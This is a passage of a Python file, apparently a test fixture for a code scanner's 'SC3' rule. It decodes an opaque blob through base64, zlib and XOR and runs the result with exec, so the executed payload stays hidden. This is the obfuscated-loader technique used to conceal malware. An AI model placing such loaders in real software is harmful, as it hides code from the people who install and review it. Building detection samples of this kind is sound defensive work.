bU6equcm60NaamtC3IlMh3npeiOu+1/9tBj9g7cGo0xbNgzQeWH9p5u/sKwJrmM0wSL6334/GVd+T/LYffijT1lNe/y5j89etwduXctQHbkXDzDzzMvhOkzVmW6ZJ8OnVcpDlgOrXi0z7nnq/f4vwOakE+v+3FPwijDaMY7IX1yhhAs="
_K = bytes.fromhex("621225707c5adaf0e90f875b")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
